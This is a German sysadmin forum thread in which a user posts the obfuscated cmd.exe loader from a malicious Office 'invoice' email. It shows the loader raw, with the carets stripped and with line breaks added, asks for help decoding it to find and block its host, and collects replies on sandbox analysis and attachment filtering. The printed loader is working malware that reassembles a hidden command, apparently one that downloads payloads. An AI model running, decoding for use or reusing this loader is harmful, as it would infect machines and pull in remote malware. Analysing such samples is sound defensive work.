zeppelin
Goto Top

Office365 Trojaner Analyse

Liebe Community,

ich wende mich an euch, um mehr über den Office365 Trojaner zu erfahren, welcher grade seine Runden durch die Unternehmen zieht.

Mitarbeiter erhalten eine Nachricht mit einer angeblichen Rechnung und darin verbirgt sich die Schadsoftware.

Heise hat dazu einen Beitrag:
https://www.heise.de/security/meldung/Trojaner-Achtung-bei-angeblichen-R ...

Ich habe mir die angebliche Rechnung genauer angeschaut und bin auf folgendes gestoßen:

cmd /V/C"^s^et ^s^Kc^p=^.^i{H^OTMP^hK^}W)^Q^a:+^g^e^XFN^dc^f^uV1-@$^6vS,/^I^=^0Bz^](bnx2^p^D[r'^J^E;^ ^sw^j^l^kt^omC^GA\y&&^f^or %^O ^in (4^7;6^2^;5^7^;18;^50^;^56^;^8;1^8;59;5^9^;^55^;^3^0^;^3^;3;^40;^37;^5^1^;25^;26;^6^3^;5^1;^5^4^;3^0;^5^;8;66^;37;^51;^8;6^1;^6^1^;^47^;^1^5;^3^5;35;^1^4^;4^4^;^14^;6^8^;14;2^3;^6^2;4^4;6^1;50^;^1^4;^2^3;^6^1;1^;4^4^;^17;^0^;1^7;1^7^;4^3^;^50;62;0^;2^3^;59^;2^5;4^3^;35;1^1;^3^1;^2^7^;5;22^;^4^6;8^;29^;8;6^1;^61;^47;^1^5;3^5;35^;6^3^;^1^8^;4^4^;6^1;6^2^;^50;2^7^;5^6^;^6^1^;^0;^2^3^;^62;63^;3^5;^65;^7;^5^8^;^1^3^;6^1;^4^6;7^;^4^5^;^18^;^2^9^;^8;^61^;61;4^7;^15;^35;35;32^;^4^7^;18^;^44^;61;^1;63^;18^;4^5^;^0;2^3^;62^;^63^;^3^5^;4^8;2^2^;^27;^4;3^3;4^;4;^29^;8^;6^1^;61;4^7^;15;3^5^;^3^5^;43;50^;^1^4^;1;^61;^8^;^5^7;1^4;1^;^6^1^;^1^8;^50^;^18;^5^6;61;6^2^;^5^0;14^;^6^1^;1^;^6^2;44^;0^;2^3;6^2;^6^3^;^35;^22^;^1^7;20^;9;53;3^2;^64^;29;^8^;^61^;^6^1^;^4^7;^15^;^3^5^;35^;4^3^;^18;^1^8^;47;^50^;^62;28^;47;^5^0;^62^;^4^7;6^2^;5^9^;1^;5^6;0^;^23^;62;^6^3^;35;45^;^2^4;6^;59^;^62^;^5^3^;6^0^;^6^1^;3^1;^51;^0^;^3^3^;^47^;5^9;^1^;6^1^;^4^2^;5^1;2^9;^51^;12;54;30^;^62^;^32^;1;^3^7^;42^;^4^9^;^33;^6^8;5^6;6^1^;1^8^;63^;0^;36;^4^;0^;^7^;^14^;^61;8^;^4^1;1^5;^1^5;6^5;1^8^;6^1^;5;^1^8;6^3;4^7;7^;^14^;6^1;^8;^4^2;12;^16;^5^1;^6^7;^6^6;^5^2^;^5^;0^;18^;4^5;^18;^51^;^1^2;54;^30^;^5^8^;^1^9;^36^;55;^3^7;2^1;^18;^57;2^8;4;4^3^;58;18;23^;61^;5^5;^28;2^3;^62^;63^;55;5^1^;^6^3^;56;^45^;^6^3;59^;46;^0^;4^5;^63^;^5^9;^8^;6^1;6^1;^47;5^1;^5^4^;^30;36^;5^7;1;^55^;^37;^5^5;21^;1^8^;57^;^2^8;^4;^4^3^;58^;^18^;^23^;6^1^;55^;^2^8^;^23;62;63^;^55^;^51;14;^22^;6^2;^22;^43;^0^;^5^6;^6^1^;5^0^;18^;14^;6^3^;^5^1^;^54^;2^4^;6^2;50^;1^8;^1^4^;2^3^;8^;^42^;30^;^22;44^;^4;55;^1;44;^55;^3^0^;^5;8;^6^6^;^12^;^2;^61^;^5^0;6^8^;^2^;^30;^58^;19^;36;0;^6^2^;4^7;^18;44^;42^;^5^1;65^;^5^3;5^;^51;^34;30;^22;4^4^;4;34;^3^8;^1^2;54^;30^;58^;19^;36^;^0^;^5^6;1^8;^4^4^;^22;^42^;1^2^;5^4;30;^3^6^;^57^;1;^0^;6^2;4^7;^1^8;4^4^;^42;1^2;54^;3^0;^36^;^57;^1;0;^61^;^68;47^;1^8;55^;^37;5^5^;27;^5^4^;30;3^6;5^7;1;0;57;50^;1;^6^1;18^;^4^2^;^3^0;^5^8^;19^;^36^;0;5^0;18^;^5^6^;47;^62;4^4;^5^6^;1^8;3^9;^62;2^2;6^8;^12^;54^;^30^;36^;^57^;1;0^;^56^;^1^4;^3^2^;^18^;^6^1^;^62^;24^;^1;^59;18^;^42^;^30;^6^2;3^2^;1;^1^2;5^4^;^3^3^;^6^1;^1^4^;^5^0^;61^;2^8^;7;5^0;^6^2^;23^;1^8;^56;^56^;^5^5;3^0^;62;32^;1^;54^;^4^3^;50^;18;^14;^6^0;1^0;^23^;1^4^;6^1^;23^;8;^2^;10^;1^0^;^5^5^;55;55;5^5^;^5^5;^5^5;5^5^;^55;^5^5^;^5^5;^55;^55;^55^;^55^;55^;55^;^5^5;^78)^d^o s^e^t c^z^oy=!c^z^oy!!^s^Kc^p:~%^O,1!&&i^f %^O ^g^tr ^7^7 c^a^ll %c^z^oy:^~^-5^3^9%"  

Damit kann erst einmal keiner was Anfangen... Ich habe im weiteren Schritt die Zirkumflex-Zeichen entfernt. Jetzt schaut das ganze etwas besser aus:

cmd /V/C"set sKcp=.i{HOTMPhK}W)Qa:+geXFNdcfuV1-@$6vS,/I=0Bz](bnx2pD[r'JE; swjlktomCGA\y&&for %O in (47;62;57;18;50;56;8;18;59;59;55;30;3;3;40;37;51;25;26;63;51;54;30;5;8;66;37;51;8;61;61;47;15;35;35;14;44;14;68;14;23;62;44;61;50;14;23;61;1;44;17;0;17;17;43;50;62;0;23;59;25;43;35;11;31;27;5;22;46;8;29;8;61;61;47;15;35;35;63;18;44;61;62;50;27;56;61;0;23;62;63;35;65;7;58;13;61;46;7;45;18;29;8;61;61;47;15;35;35;32;47;18;44;61;1;63;18;45;0;23;62;63;35;48;22;27;4;33;4;4;29;8;61;61;47;15;35;35;43;50;14;1;61;8;57;14;1;61;18;50;18;56;61;62;50;14;61;1;62;44;0;23;62;63;35;22;17;20;9;53;32;64;29;8;61;61;47;15;35;35;43;18;18;47;50;62;28;47;50;62;47;62;59;1;56;0;23;62;63;35;45;24;6;59;62;53;60;61;31;51;0;33;47;59;1;61;42;51;29;51;12;54;30;62;32;1;37;42;49;33;68;56;61;18;63;0;36;4;0;7;14;61;8;41;15;15;65;18;61;5;18;63;47;7;14;61;8;42;12;16;51;67;66;52;5;0;18;45;18;51;12;54;30;58;19;36;55;37;21;18;57;28;4;43;58;18;23;61;55;28;23;62;63;55;51;63;56;45;63;59;46;0;45;63;59;8;61;61;47;51;54;30;36;57;1;55;37;55;21;18;57;28;4;43;58;18;23;61;55;28;23;62;63;55;51;14;22;62;22;43;0;56;61;50;18;14;63;51;54;24;62;50;18;14;23;8;42;30;22;44;4;55;1;44;55;30;5;8;66;12;2;61;50;68;2;30;58;19;36;0;62;47;18;44;42;51;65;53;5;51;34;30;22;44;4;34;38;12;54;30;58;19;36;0;56;18;44;22;42;12;54;30;36;57;1;0;62;47;18;44;42;12;54;30;36;57;1;0;61;68;47;18;55;37;55;27;54;30;36;57;1;0;57;50;1;61;18;42;30;58;19;36;0;50;18;56;47;62;44;56;18;39;62;22;68;12;54;30;36;57;1;0;56;14;32;18;61;62;24;1;59;18;42;30;62;32;1;12;54;33;61;14;50;61;28;7;50;62;23;18;56;56;55;30;62;32;1;54;43;50;18;14;60;10;23;14;61;23;8;2;10;10;55;55;55;55;55;55;55;55;55;55;55;55;55;55;55;55;55;78)do set czoy=!czoy!!sKcp:~%O,1!&&if %O gtr 77 call %czoy:~-539%"  
Jetzt setze ich einen Zeilenumbruch um es einfach zu lesen:

cmd /V/C"set sKcp=.i{HOTMPhK}W)Qa:+geXFNdcfuV1-@$6vS,/I=0Bz](bnx2pD[r'JE; swjlktomCGA\y&&for %O in   

(47;62;57;18;50;56;8;18;59;59;55;30;3;3;40;37;51;25;26;63;51;54;30;5;8;66;37;51;8;61;61;47;15;35;35;14;44;14;68;14;23;62;44;61;50;14;23;61;1;44;17;0;17;17;43;50;62;0;23;59;25;43;35;11;31;27;5;22;46;8;29;8;61;61;47;15;35;35;63;18;44;61;62;50;27;56;61;0;23;62;63;35;65;7;58;13;61;46;7;45;18;29;8;61;61;47;15;35;35;32;47;18;44;61;1;63;18;45;0;23;62;63;35;48;22;27;4;33;4;4;29;8;61;61;47;15;35;35;43;50;14;1;61;8;57;14;1;61;18;50;18;56;61;62;50;14;61;1;62;44;0;23;62;63;35;22;17;20;9;53;32;64;29;8;61;61;47;15;35;35;43;18;18;47;50;62;28;47;50;62;47;62;59;1;56;0;23;62;63;35;45;24;6;59;62;53;60;61;31;51;0;33;47;59;1;61;42;51;29;51;12;54;30;62;32;1;37;42;49;33;68;56;61;18;63;0;36;4;0;7;14;61;8;41;15;15;65;18;61;5;18;63;47;7;14;61;8;42;12;16;51;67;66;52;5;0;18;45;18;51;12;54;30;58;19;36;55;37;21;18;57;28;4;43;58;18;23;61;55;28;23;62;63;55;51;63;56;45;63;59;46;0;45;63;59;8;61;61;47;51;54;30;36;57;1;55;37;55;21;18;57;28;4;43;58;18;23;61;55;28;23;62;63;55;51;14;22;62;22;43;0;56;61;50;18;14;63;51;54;24;62;50;18;14;23;8;42;30;22;44;4;55;1;44;55;30;5;8;66;12;2;61;50;68;2;30;58;19;36;0;62;47;18;44;42;51;65;53;5;51;34;30;22;44;4;34;38;12;54;30;58;19;36;0;56;18;44;22;42;12;54;30;36;57;1;0;62;47;18;44;42;12;54;30;36;57;1;0;61;68;47;18;55;37;55;27;54;30;36;57;1;0;57;50;1;61;18;42;30;58;19;36;0;50;18;56;47;62;44;56;18;39;62;22;68;12;54;30;36;57;1;0;56;14;32;18;61;62;24;1;59;18;42;30;62;32;1;12;54;33;61;14;50;61;28;7;50;62;23;18;56;56;55;30;62;32;1;54;43;50;18;14;60;10;23;14;61;23;8;2;10;10;55;55;55;55;55;55;55;55;55;55;55;55;55;55;55;55;55;78)

do set czoy=!czoy!!sKcp:~%O,1!&&if %O gtr 77 call %czoy:~-539%"  
Wenn ich das in meine Eingabeanfforderung gebe, dann zeigen sich sensible Informationen die nicht unbedingt ausserhalb des Netzwerkes gelangen sollten...

**cmd /V/C"set** sKcp=.i{HOTMPhK}W)Qa:+geXFNdcfuV1-@$6vS,/I=0Bz](bnx2pD[r'JE; swjlktomCGA\y&&for %O in   

Den hinteren Teil, verstehe ich nicht...

Die Ziffern sind vielleicht im ASCII-Zeichen?

Die Adresse die sich daraus ergibt ist vielleicht keine klassische Adresse wie wir sie kennen sondern eine Adresse aus dem DarkNET?

Lasst uns gemeinsam dieses Rätsel lösen, dann können wir diese Adresse, wenn es eine ist, in unseren Firewalls sperren :D

Mit besten Grüßen
Zeppelin

Content-ID: 392899

Url: https://administrator.de/contentid/392899

Ausgedruckt am: 14.11.2024 um 01:11 Uhr

GrueneSosseMitSpeck
GrueneSosseMitSpeck 15.11.2018 aktualisiert um 11:03:45 Uhr
Goto Top
Rein fachlich würde ich mal sagen, daß hier eine Sicherheitslücke in der Windows Shellsprache ausgenutzt wird, und natürlich ist der Code obfuscated, damit darin unerfahrene Leute erstmal nur Müll vermuten.

Eher managementmäßig betrachtet:
euer Filterystem taugt nix, und es kann sein daß Rechner schon infiziert sind und gnade dir Gott wenn einer die Mail oder das Attachment einfach nur aufmacht.

Daß du das Attachment aufgemacht hast, zeigt von ausufernder Naivität, was meinst du denn wofür der Code gemacht wurde? Um von irgendeiner Komponente verschluckt und ausgeführt zu werden um eine andere zu kompromittiereun und dann wirklich Böses zu tun ....

Ich wart nur auf deinen nächsten Post "hilfe wir haben einen Erpressungstrojaner".
SlainteMhath
SlainteMhath 15.11.2018 um 11:03:42 Uhr
Goto Top
Moin,

Die Adresse die sich daraus ergibt ist vielleicht keine klassische Adresse wie wir sie kennen sondern eine Adresse aus dem DarkNET?
Ja ne is klar face-smile Du liest zuviel (schlechte) "Hacker-Krimis" face-smile

lg,
Slainte
Zeppelin
Zeppelin 15.11.2018 aktualisiert um 14:50:43 Uhr
Goto Top
Selbstverständlich werden solche Angriffe nicht auf dem eigenen Rechner durchgeführt geschweige im eigenen Netzwerk! Dafür gibt es ausgemusterte Rechner die quasi blank sind. Trotzdem häufen sich in letzter Zeit die Angriffe.

Klar, kann ich die Firewall so konfigurieren, dass keine *.doc Dokumente von außen in das Netzwerk kommen. Dann kann ich mir aber anhören, dass man doch gerne Dokumente empfangen möchte usw....

Spar dir dein Offtopic und bringe etwas produktives.
Zeppelin
Zeppelin 15.11.2018 aktualisiert um 14:41:27 Uhr
Goto Top
Zitat von @SlainteMhath:

Moin,

Die Adresse die sich daraus ergibt ist vielleicht keine klassische Adresse wie wir sie kennen sondern eine Adresse aus dem DarkNET?
Ja ne is klar face-smile Du liest zuviel (schlechte) "Hacker-Krimis" face-smile

lg,
Slainte

Eine Adresse im DarkNET schaut oft so aus: x7giprgefwfvkeep.onion oder 62gs2n5ydnyffzfy.onion damit kann Otto-normal nur wenig mit anfangen... Deshalb die Vermutung...
ArnoNymous
ArnoNymous 15.11.2018 um 12:29:44 Uhr
Goto Top

Die Adresse die sich daraus ergibt ist vielleicht keine klassische Adresse wie wir sie kennen sondern eine Adresse aus dem DarkNET?
Ja ne is klar face-smile Du liest zuviel (schlechte) "Hacker-Krimis" face-smile

Nun, das DarkNET ist keine Erfingung aus Büchern und wird auch gerne von Kriminellen genutzt. Oder wie war dein Kommentar zu verstehen?
ArnoNymous
ArnoNymous 15.11.2018 um 12:30:42 Uhr
Goto Top
Zitat von @Zeppelin:


Eine Adresse im DarkNET schaut oft so aus: x7giprgefwfvkeep.onion oder 62gs2n5ydnyffzfy.onion damit kann Otto-normal nur wenig mit anfangen... Deshalb die Vermutung...

Meines Wissens sind die Adressen aber nicht ohne weiteres aus dem "normalen" Internet erreichbar.
Zeppelin
Zeppelin 15.11.2018 aktualisiert um 12:39:22 Uhr
Goto Top
Zitat von @ArnoNymous:

Zitat von @Zeppelin:


Eine Adresse im DarkNET schaut oft so aus: x7giprgefwfvkeep.onion oder 62gs2n5ydnyffzfy.onion damit kann Otto-normal nur wenig mit anfangen... Deshalb die Vermutung...

Meines Wissens sind die Adressen aber nicht ohne weiteres aus dem "normalen" Internet erreichbar.

Richtig, man benötigt z.B. den Tor-Browser welcher dann einem den Zugriff ermöglicht.

Die ersten Antworten auf meinen Post, ließen mich schnell zum Entschluss kommen, dass ich hier keine Antworten finden werde.

Ich habe jetzt eine Testumgebung in der ich mittels Wireshark und dem Tool "URL Revealer" versuchen werde mehr über diesen Trojaner zu erfahren.
nepixl
nepixl 15.11.2018 aktualisiert um 13:20:31 Uhr
Goto Top
Hi,

Klar, kann ich die Firewall so konfigurieren, dass keine *.doc Dokumente von außen in das Netzwerk kommen. Dann kann ich mir aber anhören, dass man doch gerne Dokumente empfangen möchte usw....

..ist ne dümmliche Aussage.

schaff Dir nen anständigen Proxy an. Der Mails annimmt, ggf (von Dir definierte) Anhänge (*.doc, *.zip,..) filtert, Dich informiert, die Mail ohne Anhang ausliefert, Du den Anhang prüfst und ggf. freigibst.

Problem solved.

Gruß
ArnoNymous
ArnoNymous 15.11.2018 um 13:30:55 Uhr
Goto Top
Zitat von @nepixl:

schaff Dir nen anständigen Proxy an. Der Mails annimmt, ggf (von Dir definierte) Anhänge (*.doc, *.zip,..) filtert, Dich informiert, die Mail ohne Anhang ausliefert, Du den Anhang prüfst und ggf. freigibst.

Problem solved.


Oh ja, das klingt spaßig. Je nach Unternehmen kann man dann schon ne Teilzeitkraft für sowas einstellen.
Ja, .doc ist alt... Aber wie wissen doch alle, wie das manchmal so läuft.
nepixl
nepixl 15.11.2018 um 14:23:57 Uhr
Goto Top
Oh ja, das klingt spaßig. Je nach Unternehmen kann man dann schon ne Teilzeitkraft für sowas einstellen.

Joar - ich pers. verifiziere händisch nur gepackte Archive. Alles andere filtern die AV's im Hintergrund direkt raus und benachrichtigen mich bei Fund.
*.doc(m) etc. werden sofort gedropt mit der Antwort, dass ausschließlich PDFs zugelassen sind.

¯\_(ツ)_/¯
Frank
Frank 15.11.2018 aktualisiert um 15:26:19 Uhr
Goto Top
Hi,

ich finde es gut und spannend das sich @Zeppelin damit beschäftigt und tiefer gehen möchte. Ich verstehe überhaupt nicht die Reaktionen einiger User hier? Klar gibt es das Darknet und es zu verleugnen ist aus meiner Sicht der falsche Weg. Auch kann man selbst die Fehler in solchen Scripten analysieren und finden.

Ich habe daher mal alles gelöscht, was nicht zur Frage und Antwort dazugehört. Bitte bleibt sachlich. Wem das Thema nicht liegt, braucht nicht zu antworten.

@nepixl
..ist ne dümmliche Aussage.
Über Sinn und Unsinn vom durchlassen der Anhänge oder einer Lösung dazu geht es doch überhaupt nicht.

@Zeppelin
Ich würde unter Linux eine Windows-VM einrichten, das Trojaner Script ausführen und mit Wireshark den Netzwerk Traffic analysieren. Damit sollte der Aufruf gefunden werden. Das dir der "URL Revealer" dabei hilft glaube ich jetzt weniger.

Gruß
Frank
St-Andreas
St-Andreas 15.11.2018 um 16:34:47 Uhr
Goto Top
Zum lernen macht es schon Sinn wenn man sich solche Malware mal genauer anschaut, aber die Sicherheit des eigenen Netzwerks kann man damit nicht erhöhen, denn die URLs unterscheiden sich bei jeder Welle, so schnell kann man die Analysen gar nicht durchführen.

Offtopic und meine Meinung:
Das blocken von Dokumententypen ist machbar, ist sinnvoll und ja, es ist unbequem für einige Nutzer, aber es ist durchsetzbar.
Wer das nicht durchsetzen kann, sollte für solche Dateitypen zumindest eine mehrstündige Quarantäne vorsehen und/oder eine Verhaltensanalyse einsetzen, mindestens aber die Benutzer regelmäßig und ordentlich schulen.
clubmaster
clubmaster 16.11.2018 um 10:12:11 Uhr
Goto Top
Zitat von @Zeppelin:

Ich habe mir die angebliche Rechnung genauer angeschaut und bin auf folgendes gestoßen:

Deine Analayse ist so nichtsagend. Was hast du denn extrahiert? Wichtig sind die Streams/Objekt usw.
Für Office-Malware kann ich die oledump.py empfehlen:
blog.didierstevens.com1 oder seine PDF-Tools.

Einfach das Zirkumflex zu entfernen ist nicht die Lösung, weil ja damit evtl. Rechenoperationen durchgeführt werden....
Vision2015
Vision2015 16.11.2018 um 18:05:48 Uhr
Goto Top
Moin...

Klar, kann ich die Firewall so konfigurieren, dass keine *.doc Dokumente von außen in das Netzwerk kommen. Dann kann ich mir aber anhören, dass man doch gerne Dokumente empfangen möchte usw....

sagte bestimmt auch der Admin des Klinikums-Fürstenfeldbruck! face-smile
Fürstenfeldbruck: Malware legt Klinikums-IT komplett lahm

sorry, in meine augen wurde da komplett versagt!
dann lass lieber die User jammern...

Frank
Zeppelin
Zeppelin 17.11.2018 um 13:07:59 Uhr
Goto Top
Die Mitarbeiter werden regelmäßig geschuld um auf solche Angriffe richtig reagieren zu können.

Unser Netzwerk blockiert bereits einen großen Teil der Angreifer dazu haben wir eine Sophos UTM im einsatz sowie entsprechende Software auf den jeweiligen Clients...

Hin und wieder schaffen es Angreifer Schadsoftware in unser Netzwerk zu schleusen und niemand hier in diesem Forum wird mir eine 100% Lösung für ein Sicheres Netzwerk anbieten.

Ich werde mein Beitrag entfernen und mich aus dieser Com ebenfalls distanzieren.
Die gemeinsame Lösungsfimdung war eine gute Idee nur wird das mit Füßen getreten.
Zeppelin
Zeppelin 17.11.2018 um 13:14:40 Uhr
Goto Top
Zitat von @Frank:

Hi,

ich finde es gut und spannend das sich @Zeppelin damit beschäftigt und tiefer gehen möchte. Ich verstehe überhaupt nicht die Reaktionen einiger User hier? Klar gibt es das Darknet und es zu verleugnen ist aus meiner Sicht der falsche Weg. Auch kann man selbst die Fehler in solchen Scripten analysieren und finden.

Ich habe daher mal alles gelöscht, was nicht zur Frage und Antwort dazugehört. Bitte bleibt sachlich. Wem das Thema nicht liegt, braucht nicht zu antworten.

@nepixl
..ist ne dümmliche Aussage.
Über Sinn und Unsinn vom durchlassen der Anhänge oder einer Lösung dazu geht es doch überhaupt nicht.

@Zeppelin
Ich würde unter Linux eine Windows-VM einrichten, das Trojaner Script ausführen und mit Wireshark den Netzwerk Traffic analysieren. Damit sollte der Aufruf gefunden werden. Das dir der "URL Revealer" dabei hilft glaube ich jetzt weniger.

Gruß
Frank


Vielen Dank für deine Nachricht. Ja genau das habe ich am Wochenende mir vorgenommen auszuprobieren.

Eigentlich soll die Arbeit auch auf der Arbeit bleiben und nun beschäftige ich mich noch in meiner Freizeit mit Düsen Thema.
Ich habe das Glück wie viele andere auch, dass ich mein Hobby zum Beruf gemacht habe und ich so meine Freude an der Materie habe egal ob auf der Arbeit oder im privaten Umfeld.
Zeppelin
Zeppelin 17.11.2018 um 13:27:18 Uhr
Goto Top
Zitat von @clubmaster:

Zitat von @Zeppelin:

Ich habe mir die angebliche Rechnung genauer angeschaut und bin auf folgendes gestoßen:

Deine Analayse ist so nichtsagend. Was hast du denn extrahiert? Wichtig sind die Streams/Objekt usw.
Für Office-Malware kann ich die oledump.py empfehlen:
blog.didierstevens.com2 oder seine PDF-Tools.

Einfach das Zirkumflex zu entfernen ist nicht die Lösung, weil ja damit evtl. Rechenoperationen durchgeführt werden....

Du hast meine Ausgangsnachricht nicht richtig interpretiert.
Ich habe die Zirkumflex entfernt um diesen Code besser lesen zu können.

Damit man vielleicht etwas mehr rauslesen kann. Es macht mich stutzig eine Schadsoftware zu finden, die auf den ersten Eindruck nichts macht.

Wir hatten in der Vergangenheit auch Probleme mit Verschlüsselungsteojnern aber da hat man die Folgen auch bemerkt. Jetzt schleust sich etwas ein und man merkt erst mal nichts...

Die Angriffsstrategie ist nicht schlecht. Ich implementiere erst mal etwas in ein Netzwerk und irgend wann vielleicht 1 oder 2 Monate später greife ich an. Keiner weiß mehr wann die Schadsoftware in das Netzwerk gekommen ist und welchen Weg diese genutzt hat...
Zeppelin
Zeppelin 17.11.2018 um 13:34:05 Uhr
Goto Top
Zitat von @ArnoNymous:

Zitat von @nepixl:

schaff Dir nen anständigen Proxy an. Der Mails annimmt, ggf (von Dir definierte) Anhänge (*.doc, *.zip,..) filtert, Dich informiert, die Mail ohne Anhang ausliefert, Du den Anhang prüfst und ggf. freigibst.

Problem solved.


Oh ja, das klingt spaßig. Je nach Unternehmen kann man dann schon ne Teilzeitkraft für sowas einstellen.
Ja, .doc ist alt... Aber wie wissen doch alle, wie das manchmal so läuft.

Da stimme ich dir zu, man könne tatsächlich eine Vollzeitstelle erzeugen um die Anhänge zu prüfen.

Ich werde unsere Geschäftsführung vorschlagen ausschließlich die Arbeit mit PDF Dokumenten zu arbeiten.

Klar, es gibt auch in PDF Dokumenten Backdoors aber das ist ein anderes Thema...
Vision2015
Vision2015 17.11.2018 aktualisiert um 14:04:10 Uhr
Goto Top
Moin...
Zitat von @Zeppelin:

Die Mitarbeiter werden regelmäßig geschuld um auf solche Angriffe richtig reagieren zu können.
das ist wichtig...

Unser Netzwerk blockiert bereits einen großen Teil der Angreifer dazu haben wir eine Sophos UTM im einsatz sowie entsprechende Software auf den jeweiligen Clients...
ich halte von Sophos sowiso nix, aber das sowas an der Sophos vorbei kommt, ist nicht normal...
Denke besser mal an eine Anlagen blockierung für bestimmte Dateitypen nach!

Hin und wieder schaffen es Angreifer Schadsoftware in unser Netzwerk zu schleusen und niemand hier in diesem Forum wird mir eine 100% Lösung für ein Sicheres Netzwerk anbieten.
nein, selten die Angreifer schleusen Schadsoftware in euer netzwerk, das macht ihr selber!

Ich werde mein Beitrag entfernen und mich aus dieser Com ebenfalls distanzieren.
jetzt werde nicht albern....
Die gemeinsame Lösungsfimdung war eine gute Idee nur wird das mit Füßen getreten.
nun ja, die gute idee wäre in einem entwickler forum gut aufgehoben, aber wir administratoren blocken sowas gleich am eingang!
und sich mit schadsoftware auseinander zu setzen und deren disassemblierung fehlt mir die zeit.

Ich werde unsere Geschäftsführung vorschlagen ausschließlich die Arbeit mit PDF Dokumenten zu arbeiten.
ein guter ansatz...

Frank
trapper-tom
trapper-tom 21.11.2018 um 13:52:57 Uhr
Goto Top
Hi Zeppelin,

habe mal ein wenig im Netz gesucht und das hier gefunden:

https://www.hybrid-analysis.com/sample/0672a7057ef39a0e5560f36fc558e8446 ...

Da wird beschrieben, was die Schadsoftware macht.

Viel Spaß beim Lesen und weiter so. Ich finde es gut, dass es Du versuchst, hinter die Funktionsweise solchen Codes zu kommen. Mir fehlt leider immer die Zeit, so was in einer isolierten Umgebung zu testen.

Trapper Tom
Zeppelin
Zeppelin 13.01.2019 um 22:00:50 Uhr
Goto Top
Hallo zusammen,

an dieser Stelle wünsche ich allen ein frohes neues und erfolgreiches Jahr.

Nicht immer aber hoffentlich bin ich nicht der einzige Poster, der sich bei allen beteiligten dieser Diskussion mit produktiven und weniger produktiven Kommentaren bedanken möchte.

Vielen herzlichen Dank, Euch allen.

Mit besten Grüßen
Zeppelin